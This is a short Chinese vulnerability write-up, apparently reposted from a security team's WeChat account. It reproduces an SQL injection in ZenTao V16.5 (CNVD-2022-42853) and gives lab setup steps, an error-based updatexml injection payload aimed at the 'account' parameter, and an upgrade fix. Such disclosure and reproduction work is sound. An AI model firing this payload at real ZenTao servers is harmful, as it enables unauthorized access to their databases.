CNVD-2022-42853:禅道V16.5SQL注入漏洞

渗透技巧 1年前 (2022) admin
696 0 0


上方蓝色字体关注我们,一起学安全!
作者:bnlbnf@Timeline Sec
本文字数:619
阅读时长:2~3min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负


0x01 简介
禅道由青岛易软天创网络科技有限公司开发,国产开源项目管理软件。

它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整覆盖了研发项目管理的核心流程。

禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的API可以调用。


0x02 漏洞概述

禅道V16.5未对输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行。


0x03 影响版本

禅道V16.5


0x04 环境搭建
下载一键安装包
https://www.zentao.net/download/zentaopms16.5-80656.html
CNVD-2022-42853:禅道V16.5SQL注入漏洞

启动,然后访问

CNVD-2022-42853:禅道V16.5SQL注入漏洞


CNVD-2022-42853:禅道V16.5SQL注入漏洞
0x05 漏洞复现

报错型注入payload:

admin' and updatexml(1,concat(0x7e,(123=123),0x7e),1) and '1'='1


CNVD-2022-42853:禅道V16.5SQL注入漏洞

CNVD-2022-42853:禅道V16.5SQL注入漏洞


0x06 修复方式


升级最新版本

https://www.zentao.net


参考链接:

https://www.cnblogs.com/spmonkey/articles/16611302.html



CNVD-2022-42853:禅道V16.5SQL注入漏洞

CNVD-2022-42853:禅道V16.5SQL注入漏洞
阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行





原文始发于微信公众号(Timeline Sec):CNVD-2022-42853:禅道V16.5SQL注入漏洞

版权声明:admin 发表于 2022年11月18日 上午9:02。
转载请注明:CNVD-2022-42853:禅道V16.5SQL注入漏洞 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...